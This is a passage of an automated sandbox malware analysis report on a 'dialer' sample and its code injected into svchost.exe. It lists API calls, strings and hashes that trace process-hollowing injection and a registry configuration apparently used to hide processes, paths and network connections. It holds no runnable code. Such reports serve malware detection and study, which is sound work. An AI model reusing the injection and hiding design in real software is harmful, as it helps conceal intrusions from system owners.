Part of subcall function 00007FF64295226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF642952261), ref: 00007FF64295237E
Part of subcall function 00007FF64295226C: RegCreateKeyExW.KERNELBASE ref: 00007FF6429523BE
Part of subcall function 00007FF64295226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6429523E5
Part of subcall function 00007FF64295226C: RegSetKeySecurity.KERNELBASE ref: 00007FF6429523FE
Part of subcall function 00007FF64295226C: LocalFree.KERNEL32 ref: 00007FF642952408

ExitProcess.KERNEL32 ref: 00007FF642952263

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
String ID:
API String ID: 3836936051-0
Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction ID: 8cd8186dff7998c93ed4246d65dbb9552f7e537e77aff332b0e6e3b854221569
Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction Fuzzy Hash: 78A00117F2E54286EA0C37B6685A06863616F94A0BFA00434D00AC6293DDAE64958659

Non-executed Functions

Function 00007FF642952560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF6429525E7

Part of subcall function 00007FF6429518AC: OpenProcess.KERNEL32(?,?,?,00007FF64295110E), ref: 00007FF6429518CA
Part of subcall function 00007FF6429518AC: IsWow64Process.KERNEL32(?,?,?,00007FF64295110E), ref: 00007FF6429518E0
Part of subcall function 00007FF6429518AC: CloseHandle.KERNELBASE(?,?,?,00007FF64295110E), ref: 00007FF6429518FB

Part of subcall function 00007FF6429510C0: OpenProcess.KERNEL32 ref: 00007FF64295112C
Part of subcall function 00007FF6429510C0: OpenProcess.KERNEL32 ref: 00007FF64295114B
Part of subcall function 00007FF6429510C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF642951170
Part of subcall function 00007FF6429510C0: PathFindFileNameW.SHLWAPI ref: 00007FF64295117E
Part of subcall function 00007FF6429510C0: lstrlenW.KERNEL32 ref: 00007FF64295118A
Part of subcall function 00007FF6429510C0: StrCpyW.SHLWAPI ref: 00007FF6429511A1
Part of subcall function 00007FF6429510C0: CloseHandle.KERNEL32 ref: 00007FF6429511AD
Part of subcall function 00007FF6429510C0: StrCmpIW.SHLWAPI ref: 00007FF6429511E2
Part of subcall function 00007FF6429510C0: NtQueryInformationProcess.NTDLL ref: 00007FF642951216
Part of subcall function 00007FF6429510C0: OpenProcessToken.ADVAPI32 ref: 00007FF642951240

RegOpenKeyExW.ADVAPI32 ref: 00007FF642952683
RegDeleteValueW.ADVAPI32 ref: 00007FF64295269B
ExitProcess.KERNEL32 ref: 00007FF6429526BF
GetProcessHeap.KERNEL32 ref: 00007FF6429526C6
HeapAlloc.KERNEL32 ref: 00007FF6429526D9
K32EnumProcesses.KERNEL32 ref: 00007FF6429526F6
ExitProcess.KERNEL32 ref: 00007FF642952796

Strings

open, xrefs: 00007FF642952960
dialerstager, xrefs: 00007FF642952694
SOFTWARE, xrefs: 00007FF642952675

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction ID: 23960c666bafcd568905e2b8868c0350984c62414abd2870668fd7f32f1cddc1
Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction Fuzzy Hash: 55D18423F0C5828AEB39BB3698002B96355FF4478EF640135E94DC7696DEBEE684C740

Function 00007FF642951C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 00007FF642951D1D
VirtualAllocEx.KERNEL32 ref: 00007FF642951D4C
WriteProcessMemory.KERNEL32 ref: 00007FF642951D73
WriteProcessMemory.KERNEL32 ref: 00007FF642951DB2
VirtualAlloc.KERNEL32 ref: 00007FF642951DE3
GetThreadContext.KERNEL32 ref: 00007FF642951DFF
WriteProcessMemory.KERNEL32 ref: 00007FF642951E26
SetThreadContext.KERNEL32 ref: 00007FF642951E44
ResumeThread.KERNEL32 ref: 00007FF642951E52
OpenProcess.KERNEL32 ref: 00007FF642951E6A
TerminateProcess.KERNEL32 ref: 00007FF642951E7D

Strings

@, xrefs: 00007FF642951D44

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction ID: 877f6fdf73be500c286654b5a9f54828e54e97af2febf9302d6f446bd1816142
Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction Fuzzy Hash: BF51AD37B08A4186EB50EB22E84066E77A1FB48B8DF554135CE4DD3758DFB9E489C704

Function 00007FF6429519C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF6429519E6
SysAllocString.OLEAUT32 ref: 00007FF6429519F6
CoInitializeEx.OLE32 ref: 00007FF642951A03
CoInitializeSecurity.OLE32 ref: 00007FF642951A3A
CoCreateInstance.OLE32 ref: 00007FF642951A7A
VariantInit.OLEAUT32 ref: 00007FF642951A8C
CoUninitialize.OLE32 ref: 00007FF642951B26
SysFreeString.OLEAUT32 ref: 00007FF642951B2F
SysFreeString.OLEAUT32 ref: 00007FF642951B38

Strings

dialersvc64, xrefs: 00007FF6429519DD

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction ID: 8d04bdc03abce4b35211887e75b1020e713789c3046ece7a8f03fe016d28c49f
Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction Fuzzy Hash: 71416F33708E8296E710AF6AE4442AD73B1FB84B8DF544135EE4D87A19DF79E185C304

Function 00007FF642951000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF642951034
RegDeleteKeyW.ADVAPI32 ref: 00007FF642951045
RegEnumKeyExW.ADVAPI32 ref: 00007FF642951082
RegCloseKey.ADVAPI32 ref: 00007FF642951093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF6429510B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF642951026, 00007FF64295109C

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction ID: 9d69752461699108c131ea53d12c20e71e26c78e40b73c2561c62d13b006ff66
Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction Fuzzy Hash: 8E11B223B1CB8581E760AF32E8457B96364FF4475DF900225D60C86999DFBDD288CB08

Function 00007FF642952A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF642952ACB
WriteFile.KERNEL32 ref: 00007FF642952AF3
WriteFile.KERNEL32 ref: 00007FF642952B16
CloseHandle.KERNEL32 ref: 00007FF642952B1F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF642952AA8

Memory Dump Source

Source File: 0000002A.00000002.3320465437.00007FF642951000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF642950000, based on PE: true

Associated: 0000002A.00000002.3320301031.00007FF642950000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320654114.00007FF642953000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002A.00000002.3320830204.00007FF642956000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_7ff642950000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction ID: f3ebaa97cc68cc675c957ca744525dc187b10d59b6b4b934036d96134f913e1d
Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction Fuzzy Hash: 6711A333B18B5182E704AF22E408329A360FB89FE9F544235DA1983B95CFBDD585C744

Analysis Process: svchost.exePID: 436, Parent PID: 6064COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	74
Total number of Limit Nodes:	2

Executed Functions

Function 0000023AF32E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000023AF32E1633
HeapAlloc.KERNEL32 ref: 0000023AF32E1642

Part of subcall function 0000023AF32E1268: GetProcessHeap.KERNEL32 ref: 0000023AF32E126E
Part of subcall function 0000023AF32E1268: HeapAlloc.KERNEL32 ref: 0000023AF32E127D
Part of subcall function 0000023AF32E1268: GetProcessHeap.KERNEL32 ref: 0000023AF32E1297
Part of subcall function 0000023AF32E1268: HeapAlloc.KERNEL32 ref: 0000023AF32E12A8

RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E16B2
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E16DF
RegCloseKey.ADVAPI32 ref: 0000023AF32E16F9
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1719
RegCloseKey.ADVAPI32 ref: 0000023AF32E1734
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1754
RegCloseKey.ADVAPI32 ref: 0000023AF32E176F
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E178F
RegCloseKey.ADVAPI32 ref: 0000023AF32E17AA
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E17CA
RegCloseKey.ADVAPI32 ref: 0000023AF32E17E5
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1805
RegCloseKey.ADVAPI32 ref: 0000023AF32E1820
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1840
RegCloseKey.ADVAPI32 ref: 0000023AF32E185B
RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E187B
RegCloseKey.ADVAPI32 ref: 0000023AF32E1896
RegCloseKey.ADVAPI32 ref: 0000023AF32E18A0

Part of subcall function 0000023AF32E12BC: RegQueryInfoKeyW.ADVAPI32 ref: 0000023AF32E1319
Part of subcall function 0000023AF32E12BC: GetProcessHeap.KERNEL32 ref: 0000023AF32E1327
Part of subcall function 0000023AF32E12BC: HeapAlloc.KERNEL32 ref: 0000023AF32E1338
Part of subcall function 0000023AF32E12BC: RegEnumValueW.ADVAPI32 ref: 0000023AF32E1397
Part of subcall function 0000023AF32E12BC: GetProcessHeap.KERNEL32 ref: 0000023AF32E13DF
Part of subcall function 0000023AF32E12BC: HeapAlloc.KERNEL32 ref: 0000023AF32E13ED
Part of subcall function 0000023AF32E12BC: GetProcessHeap.KERNEL32 ref: 0000023AF32E140A
Part of subcall function 0000023AF32E12BC: HeapFree.KERNEL32 ref: 0000023AF32E1418
Part of subcall function 0000023AF32E12BC: lstrlenW.KERNEL32 ref: 0000023AF32E1421
Part of subcall function 0000023AF32E12BC: GetProcessHeap.KERNEL32 ref: 0000023AF32E142F
Part of subcall function 0000023AF32E12BC: HeapAlloc.KERNEL32 ref: 0000023AF32E143D

Strings

startup, xrefs: 0000023AF32E16D5
service_names, xrefs: 0000023AF32E17C3
tcp_local, xrefs: 0000023AF32E17FE
paths, xrefs: 0000023AF32E1788
SOFTWARE\dialerconfig, xrefs: 0000023AF32E1692
udp, xrefs: 0000023AF32E1874
tcp_remote, xrefs: 0000023AF32E1839
process_names, xrefs: 0000023AF32E174D
pid, xrefs: 0000023AF32E1712

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: ee723ffc3aa04360758a76d5d7d100dccbb7a60cfb46d6529805fec6e03ef3e0
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: 57711B26310A1086EB149F36E85969D7368FBA4F88F401135DD8E47FA8DF3EC684C741

Function 0000023AF32E328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000023AF32E32AE
PathFindFileNameW.SHLWAPI ref: 0000023AF32E32BD

Part of subcall function 0000023AF32E3844: StrCmpNIW.SHLWAPI ref: 0000023AF32E385C

Part of subcall function 0000023AF32E3790: GetModuleHandleW.KERNEL32 ref: 0000023AF32E379E
Part of subcall function 0000023AF32E3790: GetCurrentProcess.KERNEL32 ref: 0000023AF32E37CC
Part of subcall function 0000023AF32E3790: VirtualProtectEx.KERNEL32 ref: 0000023AF32E37EE
Part of subcall function 0000023AF32E3790: GetCurrentProcess.KERNEL32 ref: 0000023AF32E3809
Part of subcall function 0000023AF32E3790: VirtualProtectEx.KERNEL32 ref: 0000023AF32E382A

CreateThread.KERNEL32 ref: 0000023AF32E330B

Part of subcall function 0000023AF32E1D14: GetCurrentThread.KERNEL32 ref: 0000023AF32E1D1F

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: bfc441e202b70e990e34d141dd28dcd24dd31b6297016785c974490ec41ce35d
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 3211617061064082F7689721F88EB69A39CBF7474AF584138AADA81DD1EF7FC3C48752

Function 0000023AF32E1ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000023AF32E1628: GetProcessHeap.KERNEL32 ref: 0000023AF32E1633
Part of subcall function 0000023AF32E1628: HeapAlloc.KERNEL32 ref: 0000023AF32E1642
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E16B2
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E16DF
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E16F9
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1719
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E1734
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1754
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E176F
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E178F
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E17AA
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E17CA

Sleep.KERNEL32 ref: 0000023AF32E1AD7
SleepEx.KERNELBASE ref: 0000023AF32E1ADD

Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E17E5
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1805
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E1820
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E1840
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E185B
Part of subcall function 0000023AF32E1628: RegOpenKeyExW.ADVAPI32 ref: 0000023AF32E187B
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E1896
Part of subcall function 0000023AF32E1628: RegCloseKey.ADVAPI32 ref: 0000023AF32E18A0

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: d293a7ecf22ae8c07a26979ff054afc44229310735744583370fa13e0ba43a09
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 8331F16120064141FF58DB26DA4A3A993ACAF64BC4F0854359E8D87FD9FF1EE6D1C212

Function 0000023AF32B273C Relevance: 1.7, APIs: 1, Instructions: 187
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000023AF32B285E

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 3da15631c9552bda4809b53278dd1c51c7a8308e220c86789214b26559236580
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: 3861FF32B01B9087EB588F15900872DB3A2FB64BA4F688135DE9D07BC8DB3DE952C711

Non-executed Functions

Function 0000023AF32E2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000023AF32E2BD0
lstrlenW.KERNEL32 ref: 0000023AF32E2E0A

Part of subcall function 0000023AF32E199C: OpenProcess.KERNEL32 ref: 0000023AF32E19C2
Part of subcall function 0000023AF32E199C: K32GetModuleFileNameExW.KERNEL32 ref: 0000023AF32E19E0
Part of subcall function 0000023AF32E199C: PathFindFileNameW.SHLWAPI ref: 0000023AF32E19EF
Part of subcall function 0000023AF32E199C: lstrlenW.KERNEL32 ref: 0000023AF32E19FB
Part of subcall function 0000023AF32E199C: StrCpyW.SHLWAPI ref: 0000023AF32E1A0E
Part of subcall function 0000023AF32E199C: CloseHandle.KERNEL32 ref: 0000023AF32E1A1C

GetProcAddress.KERNEL32 ref: 0000023AF32E2BE5

Part of subcall function 0000023AF32E152C: StrCmpIW.SHLWAPI ref: 0000023AF32E155D

Part of subcall function 0000023AF32E3844: StrCmpNIW.SHLWAPI ref: 0000023AF32E385C

StrCmpNIW.SHLWAPI ref: 0000023AF32E2C28
lstrlenW.KERNEL32 ref: 0000023AF32E2D50

Strings

NtQueryObject, xrefs: 0000023AF32E2BDB
\Device\Nsi, xrefs: 0000023AF32E2C1B
ntdll.dll, xrefs: 0000023AF32E2BC9

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: 98dc20d53b9ffa1a8ca992e3ea5a6f8ebec1cdeae552b08220cceac7e5cea71a
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: 0AB1926221075082EB5CEF25D4497A9A3A9FB64B84F445036DE8A53FD4DF3EDE80C781

Function 0000023AF32E7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000023AF32E7DAC
RtlCaptureContext.NTDLL ref: 0000023AF32E7DD9
RtlLookupFunctionEntry.NTDLL ref: 0000023AF32E7DF3
RtlVirtualUnwind.NTDLL ref: 0000023AF32E7E34
IsDebuggerPresent.KERNEL32 ref: 0000023AF32E7E88
SetUnhandledExceptionFilter.KERNEL32 ref: 0000023AF32E7EA9
UnhandledExceptionFilter.KERNEL32 ref: 0000023AF32E7EB4

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: f80704e4090aec457dd619ddbf93a46e313ac98ba8684ae4ab85bc3349a4acc6
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 48315D72305B808AEB649F64E8447ED7368F794B44F44402ADA8D57B98EF3DC648CB10

Function 0000023AF32ED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000023AF32ED31D
RtlLookupFunctionEntry.NTDLL ref: 0000023AF32ED335
RtlVirtualUnwind.NTDLL ref: 0000023AF32ED370
IsDebuggerPresent.KERNEL32 ref: 0000023AF32ED3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 0000023AF32ED3B3
UnhandledExceptionFilter.KERNEL32 ref: 0000023AF32ED3BE

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: 9624eecabc732b79e81a6373d390755405d02b5869d1bd8e9f427c0fee0c5b47
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: A6317E32214B808AEB64CF25E84539E73A8FB99B54F500126EADD43F98DF3DC695CB01

Function 0000023AF32E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000023AF32E1319
GetProcessHeap.KERNEL32 ref: 0000023AF32E1327
HeapAlloc.KERNEL32 ref: 0000023AF32E1338
RegEnumValueW.ADVAPI32 ref: 0000023AF32E1397

Part of subcall function 0000023AF32E152C: StrCmpIW.SHLWAPI ref: 0000023AF32E155D

GetProcessHeap.KERNEL32 ref: 0000023AF32E13DF
HeapAlloc.KERNEL32 ref: 0000023AF32E13ED
GetProcessHeap.KERNEL32 ref: 0000023AF32E140A
HeapFree.KERNEL32 ref: 0000023AF32E1418
lstrlenW.KERNEL32 ref: 0000023AF32E1421
GetProcessHeap.KERNEL32 ref: 0000023AF32E142F
HeapAlloc.KERNEL32 ref: 0000023AF32E143D
StrCpyW.SHLWAPI ref: 0000023AF32E145F
GetProcessHeap.KERNEL32 ref: 0000023AF32E1476
HeapFree.KERNEL32 ref: 0000023AF32E1484

Strings

d, xrefs: 0000023AF32E135A

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: 44ec96c4dca53712827799cb354bea119c19488123cee649313871abe28699f2
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: 49516C76200B8486EB58DF62E44835EB7A5F798F89F044134DE8A07B98DF3EC249CB01

Function 0000023AF32E1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000023AF32E1D1F

Part of subcall function 0000023AF32E1FD4: GetModuleHandleA.KERNEL32 ref: 0000023AF32E1FEC
